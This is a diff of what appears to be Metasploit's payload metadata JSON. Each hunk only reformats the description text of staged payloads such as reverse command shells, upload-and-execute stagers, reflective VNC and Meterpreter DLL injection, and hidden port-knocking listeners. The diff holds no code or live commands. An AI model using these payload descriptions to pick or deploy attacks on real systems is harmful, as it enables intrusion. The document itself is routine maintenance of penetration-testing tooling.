@@ -203026,7 +203872,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker over IPv6",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -203062,7 +203908,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker (No NX)",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -203097,7 +203943,7 @@
      "spoonm <spoonm@no$email.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -203134,7 +203980,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -203171,7 +204017,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a piped command shell (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Spawn a piped command shell (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -203209,7 +204055,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -203248,7 +204094,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -203287,7 +204133,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -203324,7 +204170,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker with UUID Support",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -203360,7 +204206,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Spawn a piped command shell (staged). Connect back to the attacker with UUID Support",
+    "description": "Spawn a piped command shell (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -203572,7 +204418,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -203610,7 +204456,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -203647,7 +204493,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for an IPv6 connection (Windows x86)",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -203685,7 +204531,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -203721,7 +204567,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a pipe connection (Windows x86)",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -203756,7 +204602,7 @@
      "vlad902 <vlad902@gmail.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a connection (No NX)",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -203793,7 +204639,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a connection (Windows x86)",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -203832,7 +204678,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a connection",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -203869,7 +204715,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Uploads an executable and runs it (staged). Listen for a connection with UUID Support (Windows x86)",
+    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -203905,7 +204751,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Uploads an executable and runs it (staged). Use an established connection",
+    "description": "Uploads an executable and runs it (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -203942,7 +204788,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker over IPv6",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -203977,7 +204823,7 @@
      "vlad902 <vlad902@gmail.com>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker (No NX)",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -204013,7 +204859,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -204050,7 +204896,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -204087,7 +204933,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Uploads an executable and runs it (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Uploads an executable and runs it (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -204125,7 +204971,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -204164,7 +205010,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -204203,7 +205049,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -204240,7 +205086,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -204276,7 +205122,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support",
+    "description": "Uploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -204313,7 +205159,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204351,7 +205197,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204388,7 +205234,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection (Windows x86)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204426,7 +205272,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204462,7 +205308,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a pipe connection (Windows x86)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a pipe connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204498,7 +205344,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection (No NX)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204535,7 +205381,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection (Windows x86)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204574,7 +205420,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204611,7 +205457,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Listen for a connection with UUID Support (Windows x86)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204647,7 +205493,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Use an established connection",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nUse an established connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204685,7 +205531,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204721,7 +205567,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows wininet)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204757,7 +205603,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204794,7 +205640,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker over IPv6",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker over IPv6",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204830,7 +205676,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker (No NX)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204866,7 +205712,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204903,7 +205749,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204940,7 +205786,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204978,7 +205824,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205017,7 +205863,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205056,7 +205902,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205093,7 +205939,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker with UUID Support",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205130,7 +205976,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205166,7 +206012,7 @@
      "bwatters-r7",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Listen for an IPv6 connection (Windows x64)",
+    "description": "Custom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [

    ],
@@ -205202,7 +206048,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Custom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -205237,7 +206083,7 @@
      "bwatters-r7",
      "UserExistsError"
    ],
-    "description": "Custom shellcode stage. Listen for a pipe connection (Windows x64)",
+    "description": "Custom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
    "references": [

    ],
@@ -205272,7 +206118,7 @@
      "bwatters-r7",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Listen for a connection (Windows x64)",
+    "description": "Custom shellcode stage.\n\nListen for a connection (Windows x64)",
    "references": [

    ],
@@ -205312,7 +206158,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -205348,7 +206194,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Listen for a connection with UUID Support (Windows x64)",
+    "description": "Custom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -205383,7 +206229,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [

    ],
@@ -205420,7 +206266,7 @@
      "agix",
      "rwincey"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [

    ],
@@ -205455,7 +206301,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -205490,7 +206336,7 @@
      "bwatters-r7",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker (Windows x64)",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
    "references": [

    ],
@@ -205530,7 +206376,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -205566,7 +206412,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [

    ],
@@ -205601,7 +206447,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
    "references": [

    ],
@@ -205636,7 +206482,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
    "references": [

    ],
@@ -205671,7 +206517,7 @@
      "Matt Graeber",
      "Shelby Pace"
    ],
-    "description": "Spawn a piped command shell (staged). Connect to MSF and read in stage",
+    "description": "Spawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
    "references": [

    ],
@@ -205845,7 +206691,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205882,7 +206728,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205920,7 +206766,7 @@
      "OJ Reeves",
      "UserExistsError"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a pipe connection (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a pipe connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205957,7 +206803,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205998,7 +206844,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -206035,7 +206881,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection with UUID Support (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -206072,7 +206918,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -206112,7 +206958,7 @@
      "agix",
      "rwincey"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -206149,7 +206995,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker via a named pipe pivot",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -206186,7 +207032,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -206227,7 +207073,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -206264,7 +207110,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -206301,7 +207147,7 @@
